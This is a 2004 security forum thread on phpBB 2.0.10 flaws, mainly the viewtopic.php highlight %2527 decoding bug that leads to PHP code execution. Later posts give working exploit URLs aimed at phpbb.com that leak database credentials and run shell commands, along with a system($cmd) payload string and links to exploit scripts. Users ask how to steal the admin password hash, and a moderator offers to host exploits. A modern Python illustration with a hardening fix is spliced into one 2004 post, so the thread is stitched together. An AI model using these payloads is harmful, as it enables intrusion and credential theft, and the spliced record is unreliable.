Waraxe IT Security Portal  
www.waraxe.us Forum Index -> PhpBB
vulns in phpbb 2.0.10 (page 1 of 4)
Posted: Mon Nov 15, 2004 5:56 pm by hebe (Advanced user; joined Sep 04, 2004; 59 posts)
Quote:
http://www.howdark.com

----------------------------------------------------------------------------------------------------------------------------------
// Information
----------------------------------------------------------------------------------------------------------------------------------

Author: How Dark
Date: October 14, 2004
URL: http://www.howdark.com

Affected Software: phpBB 2
Software Version: 2.0.* - 2.0.10
Software URL: http://www.phpbb.com

Attack: SQL Injection, allowing people to manipulate the query into pulling data
they should not previously be able to obtain. (Such as passwords)

Description: Requiring the account to be a moderator, or having a moderation session
with the correct cookie, to actually execute this attack, it is not that big
of an issue, but it still is there.

----------------------------------------------------------------------------------------------------------------------------------

xxx

----------------------------------------------------------------------------------------------------------------------------------
// Description
----------------------------------------------------------------------------------------------------------------------------------

Including an F (forum) with a MODE, but without a T (topic), leads to an SQL error.
But because topic turns all user input values into numbers, the injection is
useless, unless a way around this is found.

----------------------------------------------------------------------------------------------------------------------------------

xxx

----------------------------------------------------------------------------------------------------------------------------------
// URL
----------------------------------------------------------------------------------------------------------------------------------

modcp.php?mode=[mode]&f=1&t=[SQL]&sid=[your mod session]

----------------------------------------------------------------------------------------------------------------------------------

xxx

----------------------------------------------------------------------------------------------------------------------------------
// Line: 801
----------------------------------------------------------------------------------------------------------------------------------

$sql = "SELECT u.username, p.*, pt.post_text, pt.bbcode_uid, pt.post_subject, p.post_username
FROM " . POSTS_TABLE . " p, " . USERS_TABLE . " u, " . POSTS_TEXT_TABLE . " pt
WHERE p.topic_id = $topic_id
AND p.poster_id = u.user_id
AND p.post_id = pt.post_id
ORDER BY p.post_time ASC";

----------------------------------------------------------------------------------------------------------------------------------
// Line: 806
----------------------------------------------------------------------------------------------------------------------------------

----------------------------------------------------------------------------------------------------------------------------------
// SQL Error
----------------------------------------------------------------------------------------------------------------------------------

Could not get topic/post information

DEBUG MODE

SQL Error : 1064 You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND p.poster_id = u.user_id AND p.post_id = pt.post_id

SELECT u.username, p.*, pt.post_text, pt.bbcode_uid, pt.post_subject, p.post_username FROM htf_posts p, htf_users u, htf_posts_text pt WHERE p.topic_id = AND p.poster_id = u.user_id AND p.post_id = pt.post_id ORDER BY p.post_time ASC

Line : 809
File : modcp.php



2nd
Quote:
http://www.howdark.com

----------------------------------------------------------------------------------------------------------------------------------
// Information
----------------------------------------------------------------------------------------------------------------------------------

Author: How Dark
Date: October 1, 2004
URL: http://www.howdark.com

Affected Software: phpBB 2
Software Version: 2.0.* - 2.0.10
Software URL: http://www.phpbb.com

Attack: SQL Injection, allowing people to manipulate the query into pulling data
they should not previously be able to obtain. (Such as passwords)
Arbitrary EXEC allows you, if you can get on to a new line, to execute
your own PHP, which can be fatal.

Description: Because of the way urldecode and magic quotes work,
it turns %2527 into %27, which is a single quote, and it
leaves it unslashed. This gives you an SQL Injection, leading
to an arbitrary PHP exec hole. But because you can't get outside
preg_replace because of magic quotes, this is very very useless.

----------------------------------------------------------------------------------------------------------------------------------

xxx

----------------------------------------------------------------------------------------------------------------------------------
// Description
----------------------------------------------------------------------------------------------------------------------------------

Highlighting %2527 on any topic.

----------------------------------------------------------------------------------------------------------------------------------

xxx

----------------------------------------------------------------------------------------------------------------------------------
// URL
----------------------------------------------------------------------------------------------------------------------------------

viewtopic.php?t=1&highlight=%2527

----------------------------------------------------------------------------------------------------------------------------------

xxx

----------------------------------------------------------------------------------------------------------------------------------
// Error
----------------------------------------------------------------------------------------------------------------------------------

Parse error: parse error, unexpected T_STRING in viewtopic.php(1109) : regexp code on line 1

Fatal error: Failed evaluating code: preg_replace('#\b(')\b#i', '\1', '>[POST TEXT HERE]<') in viewtopic.php on line 1109

---------------------------------------------------------------------------------------------------------


psoftx wrote this in the phpBB community:
Code:
We have had and continue to receive reports based on a bugtraq email submitted by the "howdark.com" group. Please do not report these issues to us, not by PM, email nor via our security tracker.

The two "sql injection" issues are not sql injection issues, nothing can be done with them at all due to type casting (strings are forced to an integer type). The group admit this themselves but persist in claiming they are sql injection issues. The "solution" they give contains semantically incorrect SQL (you do not enclose values for integer field types in quotes).

The third issue, search highlighting, has been checked by us several times and we can do nothing with it at all. Again, that particular group admit likewise. In a future release of 2.0.x we will eliminate the problem once and for all, but as noted it cannot (to our knowledge and as noted, testing) be taken advantage of and thus is not considered by us to be cause for an immediate release.
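As an added illustration (this is not code from the howdark advisory, from anyone in this thread, or from phpBB), the Python below models the three decode-and-escape stages the second advisory describes for viewtopic.php's highlight parameter, so the %2527 to %27 to bare-quote path past magic_quotes can be followed, and adds a post-decode check of the kind that closes it. The `$text` placeholder, the allowed-word rule and the hardened variant are assumptions, not phpBB's own fix.

```python
# Added example: not code from the howdark advisory, the thread, or phpBB.
# Models the request path the advisory describes for viewtopic.php?highlight=
import re
from typing import List, Optional
from urllib.parse import unquote

def php_addslashes(s: str) -> str:
    """Mimics PHP addslashes(), which magic_quotes_gpc applied to GET values."""
    return s.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')

def highlight_words(raw_query_value: str) -> List[str]:
    """Stage 1: the server percent-decodes the query string once.
    Stage 2: magic_quotes_gpc escapes quotes in that decoded value.
    Stage 3: the script calls urldecode() on it a second time, which is the
    advisory's point: %2527 -> %27 -> ' and the quote was never escaped."""
    stage1 = unquote(raw_query_value)
    stage2 = php_addslashes(stage1)
    stage3 = unquote(stage2)
    return stage3.split()

def highlight_code(words: List[str]) -> str:
    """Shape of the string the vulnerable version evaluated (compare the
    fatal error quoted in the advisory): the words are pasted into a
    single-quoted PHP pattern literal, so a bare quote in a word closes
    that literal. $text stands in for the post body (assumed placeholder)."""
    return "preg_replace('#\\b(" + "|".join(words) + ")\\b#i', '\\1', $text)"

def quote_breaks_literal(raw_query_value: str) -> bool:
    """True when the request leaves an unescaped quote inside the literal."""
    joined = "|".join(highlight_words(raw_query_value))
    return re.search(r"(?<!\\)'", joined) is not None

SAFE_WORD = re.compile(r"^[\w*]+$")   # assumed rule: word chars plus wildcard *

def safe_highlight_pattern(raw_query_value: str) -> Optional[str]:
    """Hardened variant (assumed, not phpBB's own fix): validate each word
    after the final decode and escape regex metacharacters, so nothing in
    the request can change the pattern; and never build code from it."""
    words = highlight_words(raw_query_value)
    if not words or any(not SAFE_WORD.match(w) for w in words):
        return None
    parts = [re.escape(w).replace(r"\*", r"\w*") for w in words]
    return r"\b(" + "|".join(parts) + r")\b"

if __name__ == "__main__":
    for value in ("%27", "%2527", "php%20bb*"):
        print(value, highlight_words(value), quote_breaks_literal(value),
              safe_highlight_pattern(value))
```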
Posted: Mon Nov 15, 2004 11:58 pm by jessica (Regular user; joined Sep 18, 2004; 5 posts)
Quote:
-----------------------------------------------------------------------------------------------------
// Updates
-----------------------------------------------------------------------------------------------------

Just a note on the phpBB finds, they are NOT SQL Injection issues,
they are just poorly coded errors, as I had stated.

This is just immature of the phpBB Group to say we were persistent
about these, considering they were not submitted to BugTRAQ because
we knew for a fact they were useless.

The highlight error, as I stated is not harmful under the circumstances
of the default code, but if presented with minor changes, which is known
to some widely known phpBB Boards, they could present problems.

The highlight error is NOT, and I repeat NOT, SQL Injection, I am sorry
for the misworded presentation. I found this awhile ago, and I asked
a friend, who is well knowledged about these subjects, what to label
this with the options I had for the phpBB Security Tracker, and this is
what he gave me.

I did not check over what I sent, stupidly, and that is how it was sent out.
Sorry for the inconvenience.

Keep note, that these would not even be on BugTRAQ if phpBB were
not immature about the bug reports I gave them, and they mildly ignored.
Posted: Wed Nov 17, 2004 2:30 pm by LINUX (Moderator; joined May 24, 2004; 404 posts; location: Caiman)
psoftx wrote this in the phpBB community:
Code:
We have had and continue to receive reports based on a bugtraq email submitted by the "howdark.com" group. Please do not report these issues to us, not by PM, email nor via our security tracker.

The two "sql injection" issues are not sql injection issues, nothing can be done with them at all due to type casting (strings are forced to an integer type). The group admit this themselves but persist in claiming they are sql injection issues. The "solution" they give contains semantically incorrect SQL (you do not enclose values for integer field types in quotes).

The third issue, search highlighting, has been checked by us several times and we can do nothing with it at all. Again, that particular group admit likewise. In a future release of 2.0.x we will eliminate the problem once and for all, but as noted it cannot (to our knowledge and as noted, testing) be taken advantage of and thus is not considered by us to be cause for an immediate release.

----------------------------------

PHPBB developers read read read ERROR ERROR

WTF xD

Good work Jessica
Posted: Thu Nov 18, 2004 1:47 am by jessica (Regular user; joined Sep 18, 2004; 5 posts)
Just a note, look how they edit their post now that there's a proof of concept; this is one of the most dangerous phpBB exploits ever.


Proof of Concept:

http://www.howdark.com/phpbb2010.phps
Posted: Thu Nov 18, 2004 7:17 am by hebe (Advanced user; joined Sep 04, 2004; 59 posts)
jessica wrote:
Just a note, look how they edit their post now that there's a proof of concept; this is one of the most dangerous phpBB exploits ever.


Proof of Concept:

http://www.howdark.com/phpbb2010.phps

hahah they must patch now
and also these
1. "username" is $dbuser:
http://www.phpbb.com/phpBB/viewtopic.php?p=1316231&highlight=%2527.$poster=$dbuser.%2527

2. "username" is $dbpasswd:
http://www.phpbb.com/phpBB/viewtopic.php?p=1316231&highlight=%2527.$poster=$dbpasswd.%2527

3. "username" is $dbname:
http://www.phpbb.com/phpBB/viewtopic.php?p=1316231&highlight=%2527.$poster=$dbname.%2527

4. "username" is result of passthru("id"):
http://www.phpbb.com/phpBB/viewtopic.php?p=1316231&highlight=%2527.$poster=`id`.%2527
"username" is result of passthru("ls"):
http://www.phpbb.com/phpBB/viewtopic.php?p=1316231&highlight=%2527.$poster=`ls`.%2527
Posted: Thu Nov 18, 2004 8:03 am by LINUX (Moderator; joined May 24, 2004; 404 posts; location: Caiman)
OMG very nice :lol:
Posted: Thu Nov 18, 2004 10:53 am by hebe (Advanced user; joined Sep 04, 2004; 59 posts)
jessica wrote:
Just a note, look how they edit their post now that there's a proof of concept; this is one of the most dangerous phpBB exploits ever.


Proof of Concept:

http://www.howdark.com/phpbb2010.phps


Does this only work on Windows servers?
"/viewtopic.php?t=$topic&highlight=%2527%252esystem(".$cmd.")%252e%2527";
What is cmd?
Posted: Thu Nov 18, 2004 1:05 pm by jessica (Regular user; joined Sep 18, 2004; 5 posts)
No, it'll work on most OSes.

It'll just be limited by what OS it is, i.e. Unix is ls and Windows is dir.

It isn't very useful because you are logged in as no user, so you don't have write permission or anything, so you can read like config.php (cat config.php on unix) and you have to view the page source since config.php has <? ?> and the page parses it thinking it's html.

But other than that you are pretty much out of luck.

CMD Example Script is here:
http://www.howdark.com/exploit
Posted: Thu Nov 18, 2004 1:11 pm by jessica (Regular user; joined Sep 18, 2004; 5 posts)
And just to think phpBB devs reported me to my ISP for trying to help them with this.

assholes.
Posted: Fri Nov 19, 2004 3:15 am by LINUX (Moderator; joined May 24, 2004; 404 posts; location: Caiman)
jessica, if you need a host for exploits, send a PM :o
Posted: Sun Nov 21, 2004 1:57 pm by sygma (Regular user; joined Nov 21, 2004; 7 posts)
Quote:
&highlight=%2527.$poster=$dbname.%2527


Is there a way I could make an SQL query and thus obtain the admin's hashed password?

_________________
[i]no word to save thee[/i]
Posted: Sun Nov 21, 2004 10:14 pm by kranium (Regular user; joined Jun 27, 2004; 7 posts)
sygma wrote:
Quote:
&highlight=%2527.$poster=$dbname.%2527


Is there a way I could make an SQL query and thus obtain the admin's hashed password?


Yes, I wish I could do that too. I used the exploit in http://www.howdark.com/exploit/ but every time I try some SQL query it shows me NOTHING :( Any ideas?
Posted: Mon Nov 22, 2004 9:34 pm by SteX (Advanced user; joined May 18, 2004; 181 posts; location: Serbia)
Doesn't work for me...

_________________

We would change the world, but God won't give us the sourcecode...
....Watch the master. Follow the master. Be the master....
-------------------------------------------------------
Posted: Tue Nov 23, 2004 3:59 am by LINUX (Moderator; joined May 24, 2004; 404 posts; location: Caiman)
SteX wrote:
Doesn't work for me...



What doesn't work, SteX? I tested it and it works nicely :lol:

The exploit works in all phpBB forums 2.0.* - 2.0.10.
Posted: Tue Nov 23, 2004 2:33 pm by SteX (Advanced user; joined May 18, 2004; 181 posts; location: Serbia)
What did you enter in the SQL tab?

_________________

We would change the world, but God won't give us the sourcecode...
....Watch the master. Follow the master. Be the master....
-------------------------------------------------------